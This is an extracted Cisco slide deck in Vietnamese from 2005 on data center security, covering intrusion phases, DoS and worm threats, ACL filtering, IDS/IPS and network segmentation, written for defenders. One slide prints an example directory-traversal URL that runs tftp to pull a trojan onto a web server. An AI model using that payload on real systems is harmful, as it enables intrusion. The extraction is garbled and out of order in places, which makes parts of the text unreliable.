1 © 2005 Cisco Systems, Inc. All rights reserved. An ninh, an tòan cho trung tâm dữ liệu SERVER FARM TERRY SEETO GIÁM ĐỐC GIẢI PHÁP DOANH NGHIỆP CISCO CHÂU Á THÁI BÌNH DƯƠNG CCIE #3119 222 © 2005 Cisco Systems, Inc. All rights reserved. Lịch trình • Các nguy cơ về an ninh đốivới trung tâm dữ liệu • Kỹ thuật an ninh trung tâm dữ liệu • Thiếtkế trung tâm dữ liệu 333 © 2005 Cisco Systems, Inc. All rights reserved. Cisco đãsẵn sàng vớitrungtâmdữ liệu Network Topology và cách thứchướng tới trung tâm dữ liệu DC… Virtual Server Clusters Mạng doanh nghiệp Đáu nốiliênkết trung tâm dữ liệu GE, 10GE Infiniband FC, FICON, ISCSI GE, 10GE Mạng truy nhập NAS EMC Các thiếtbị đitheomạng File, Content Caches GE, 10GE FC Multiprotocoll Gateway Services GE Blade, UNIX/NT Servers, Mainframes Storage & Tape Arrays Các nguồnlưutrữs Firewall ServicesDDOS Guard Intrusion Prevention Server Load Balancing SSL Off-load INTEGRATED NETWORK SERVICES SSL/IPSec VPN Internet Internet MPLS VPN MPLS VPN IPSEC/SSL VPN IPSEC/SSL VPN Nhân viên /đối tác /khách hàng SFS 7000 SFS 7000 SFS 7000 Mạng ma trận máy chủ Server Virtualization RDMA độ trễ thấp Virtual I/O Grid/Utility Computing Các dịch vụảotíchhợp V Clustering Catalyst SERVER FARM NETWORK An ninh trung tâm dữ liệu SECONDARY DATA CENTER FC, FICON, FCIP FC, FICON SONET/SDH xWDM Metro Ethernet FCIP ONS 15000 MDS 9500 Mạng vùng lưutrữ Dịch vụ định tuyến ma trậns Data Replication Services Storage Virtualization Ma trân ảos (VSANs) Các dịch vụ lưutrữ tích hợp 444 © 2005 Cisco Systems, Inc. All rights reserved. Các nguy cơ an ninh trung tâm dữ liệu 555 © 2005 Cisco Systems, Inc. All rights reserved. Các nguy cơ an ninh trung tâm dữ liệu Các nguy cơ can thiệp trái phép Các nguy cơ từ chốidịch vụ Các nguy cơ về sâu 666 © 2005 Cisco Systems, Inc. All rights reserved. Trình tự can thiệptráiphépđiểnhình Phase 1: Hacking vào Server của Web và ứng dụng • Sau bước probing/scanning, kể xâm nhập (hacker) phát hiện điểm yếucủa server web/ứng dụng • Hacker khai thác điểmyếu để lấy shell • Ví dụ: copy virus trojan vào server web/ứng dụng: HTTPS://www.example.com/scripts/ %c0%af /winnt/system32/cmd.exe? /c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe Web Server Web Server Web/application Database Phân đoạnlớp2 Phân đoạnlớp2 HTTP 777 © 2005 Cisco Systems, Inc. All rights reserved. Trình tự can thiệp trái phép điểnhình Phase 2 – Các chiếnlược • The hacker looks for the Database server, and if the web/application servers are layer 2 adjacent (with dual NICs for example) this is extremely easy • Use a command line scanner • Identify the vulnerabilities of the DB server • Then obtain the shell of the database server and dump the database information STRATEGY 1: ACCESSING THE DATABASE STRATEGY 2: SNIFFING THE TRAFFIC 888 © 2005 Cisco Systems, Inc. All rights reserved. CÁC NGUY CƠ TỪ CHỐI DỊCH VỤ 999 © 2005 Cisco Systems, Inc. All rights reserved. Các mụctiêutấn công DoS • Mụctiêutấn công DoS là làm cho các ứng dụng không phù hợpnữa • Phương thức này có thể nhằm đến: Máy chủ Server Thiếtbị mạng Đường liên kếtmạng • Có thể đượckếthợpvới: Nhái lại địachỉ nguồnIP • Các hiểm nguy đi cùng bao gồm: Bão hòa các bảng chuyểntiếp mạng mbehrin g Các bảng trạng thái Băng thông Các máy chủ 101010 © 2005 Cisco Systems, Inc. All rights reserved. Các tấn công DoS thông thường • Tính dễ tổnthương củagiaothức • Ngậplụt các gói ICMP, UDP, SYN • Ánh xạ ICMP, UDP Broadcast Amplification TCP SYN DNS • Các đấunối đã đượcthiếtlập TCP Connects HTTP Gets [...]... phân tích IDS © 2005 Cisco Systems, Inc All rights reserved 32 Lịch trình • Các nguy cơ an ninh trung tâm dữ liệu • Kỹ thuật an ninh trung tâm dữ liệu Phát hiện, phòng ngừa xâm nhập trái phép Phát hiện và giảm thiểu từ chối dịch vụ Phát hiện và giảm thiểu sâu • Thiết kế trung tâm dữ liệu Phân đoạn các máy tính (Serverfarm) Các kỹ thuật bắt giữ và phát hiện xâm nhập © 2005 Cisco Systems, Inc All rights... truy nhập đến các servers trình diễn tại một số cổng xác định Trình diễn Database 22 Lọc lưu lượng Ranh giới ACLs Ranh giới ACL phải được xem xét trong quá trình thực hiện an ninh trung tâm dữ liệu FW Rule Type Rule Description Exemption ICMP Echo Reply Outgoing Ping Commands Require Echo-reply Messages To Come Back Exemption ICMP Time-Exceeded Outgoing Traceroute Commands Require Time-exceeded Messages... Backdoor servers Qaz, CodeRed_II, Nimda • Keyloggers • Các cái khác Các máy chủ chuyển tiếp Sniffers (passwords, botnet theft) Phá hủy, làm gián đoạn và ăn trộm dữ liệu Phá hủy phần cứng Thay đổi nối dung trang Web Sửa chữa sâu Bugbear • “Supercomputer” Networks Opaserv © 2005 Cisco Systems, Inc All rights reserved 17 Lịch trình • Các nguy cơ an ninh trung tâm dữ liệu • Kỹ thuật an ninh trung tâm dữ liệu. .. 2005 Cisco Systems, Inc All rights reserved 17 Lịch trình • Các nguy cơ an ninh trung tâm dữ liệu • Kỹ thuật an ninh trung tâm dữ liệu • Thiết kế an ninh cho trung tâm dữ liệu © 2005 Cisco Systems, Inc All rights reserved 18 Các kỹ thuật anh ninh trung tâm dữ liệu Phát hiện và phòng chống xâm nhập trái phép Phát hiện và giảm thiểu DOS © 2005 Cisco Systems, Inc All rights reserved Phát hiện và giảm thiểu... kê truy nhập (Access-Lists) Giảm thiểu các tấn công tiềm năng, ngừng tải về công cụ để tạo thời cơ cho các tấn công • IDS và IPS Phát hiện và phòng ngừa các tấn công tại lớp ứng dụng • Quản lý và tương qua các sự kiện • Kiểm tra kỹ ARP và PVLANs Phòng ngừa MITM trong cùng miền lớp 2 • SSL offloading with Back-End Encryption: Web Server Web Server Phòng ngừa tấn công SSL MITM và cho phép phân tích IDS... cạnh can thiệp trái phép: quét do thám, xác định mục tiêu, thỏa hiệp, gắn và điều khiển tấn công ” Dave Dittrich, 2004 © 2005 Cisco Systems, Inc All rights reserved 15 Sâu lan truyền bằng cách nào? • Khai thác mạng và điểm yếu • Cửa sổ sau (Backdoors) • Từ khóa (mật khẩu) kém hoặc để ở chế độ mặc định • Chia se file Windows • Các trang Web đen • E-mail • Các kênh IRC • Instant Messaging • Peer-to-peer... and Destinations for this Traffic Exclusion Denying Any Network Traffic from a Source Address Matching an Address on the Protected Network This Is Known as IP Anti-Spoofing Protection Because it Prevents Traffic from an Unprotected Network From Assuming The Identity Of A Device on the Protected Network; Note that Unicast RPF Checks (Next Subsection) Can Be Used to Provide this Functionality Exclusion... duyệt kỹ ARP và PVLANs • SSL offloading with Back-End Encryption: © 2005 Cisco Systems, Inc All rights reserved Web Server Web Server 21 Điều khiển truy nhập và phân đoạn mạng Inbound ACLs: Giảm thiểu các điểm yếu Internet Outbound ACLs: Dừng tải về các công cụ tấn công Gỉa sử có ít nhất 01 PC trong mạng doanh nghiệp bị tấn công ACL Logging: Bắt được các quét và sự bất bình thường Antispoofing: Phòng... ICMP Traceroute Allow an Incoming Traceroute Exemption ICMP Unreachable Permit All "Unreachable" Messages to Come Back; If a Router Cannot Forward or Deliver a Datagram, it Sends an ICMP Unreachable Message Back to the Source and Drops the Datagram Exemption Network Management Protocols (SSH, SSL, Syslog, SNMP) These Protocols Should Have ACL Entries that Strictly Limit the Sources and Destinations for... Applications Supported Denied By Default, Access Lists Are Defined as ‘Deny Any Any’ This Denies All Other IP Traffic from Being Forwarded across the Interface © 2005 Cisco Systems, Inc All rights reserved 23 ACL ở đâu? • Routed ACLs, VLAN ACLs Tốc độ đôi dây © 2005 Cisco Systems, Inc All rights reserved • Bức tường lửa các ACL T an trạng thái, có thể quản lý 24 Hỗ trợ cấu hình ACL © 2005 Cisco Systems, . Lịch trình • Các nguy cơ an ninh trung tâm dữ liệu • Kỹ thuật an ninh trung tâm dữ liệu • Thiếtkế an ninh cho trung tâm dữ liệu 191919 © 2005 Cisco Systems,. vớitrungtâmdữ liệu Network Topology và cách thứchướng tới trung tâm dữ liệu DC… Virtual Server Clusters Mạng doanh nghiệp Đáu nốiliênkết trung tâm dữ liệu